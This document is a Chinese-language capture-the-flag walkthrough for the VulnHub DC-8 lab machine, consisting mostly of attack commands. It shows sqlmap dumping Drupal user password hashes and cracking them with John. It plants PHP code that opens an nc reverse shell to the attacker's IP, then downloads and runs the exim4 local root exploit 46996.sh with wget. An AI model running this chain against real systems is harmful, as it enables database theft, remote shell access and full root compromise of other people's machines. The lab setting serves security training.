漏洞复现 -- DC-8

靶场地址

https://download.vulnhub.com/dc/DC-8.zip

目标

获取所有的flag

漏洞复现

sudo arp-scan -l
# 探测主机存活

nmap -p- 192.168.5.132 --min-rate-5000
# 扫描开放端口

http://192.168.5.132:80
# 访问80端口

发现在点击蓝色字体的时候，页面URL栏会改变，类似于SQL注入

python3 sqlmap.py -u "http://192.168.5.132/?nid=1" --batch --current-db
# 爆库

python3 sqlmap.py -u "http://192.168.5.132/?nid=1" --batch -D 'd7db' -tables
# 爆表

python3 sqlmap.py -u "http://192.168.5.132/?nid=1" --batch -D 'd7db' -T 'users' -columns
# 爆字段

python3 sqlmap.py -u "http://192.168.5.132/?nid=1" --batch -D 'd7db' -T 'users' -C'name,pass,uid' -dump
# 爆数据

admin		$S$D2tRCYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDc90QqJi3ICg5z
john		$S$DqupvJbxVmgjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

john 1.txt
# 将上面两个密码写入到1.txt中，使用john爆破明文密码，时间过于漫长，直接看结果 turtle

dirsearch -u http://192.168.5.132 -z 200
# 探测网站目录，发现一个登录界面

http://192.168.5.132/user/login
# 使用 john/turtle 登陆成功，在网页中寻找有用信息

直接写入反弹shell

<p>上传成功</p>
<?php
exec("nc -e /bin/bash 192.168.5.129 6666");
?> 
# 将提交重定向行Confirmation page（确认页面）给勾上，然后滑下点保存，联系随便填入联系表单，点击发送，触发PHP代码

kali：nc -lvvp 6666

python -c "import pty;pty.spawn('/bin/bash')"
# 更改shell交互的环境

find / -perm -4000 -type f 2>/dev/null
# 查看是否可以SUID提权

找到一个exim4的命令，查看其版本

/usr/sbin/exim4 --version

searchsploit exim 4
# 寻找版本漏洞

cp /usr/share/exploitdb/exploits/linux/local/46996.sh hack.sh  
# 根据提示本地提权，所以复制这个文件到桌面，然后开启http服务，让靶机获取到这个脚本并运行

cat hack.sh
# 查看使用语法  ./raptor_exim_wiz -m netcat

python -m http.server 8888 
# 开启http服务

cd /tmp
wget http://192.168.5.129:8888/hack.sh

ls -al
chmod 777 hack.sh
./hack.sh -m netcat
# 执行脚本

python -c "import pty;pty.spawn('/bin/bash')"
# 更改shell交互的环境

cd ../../../root
ls -al
cat flag.txt

总结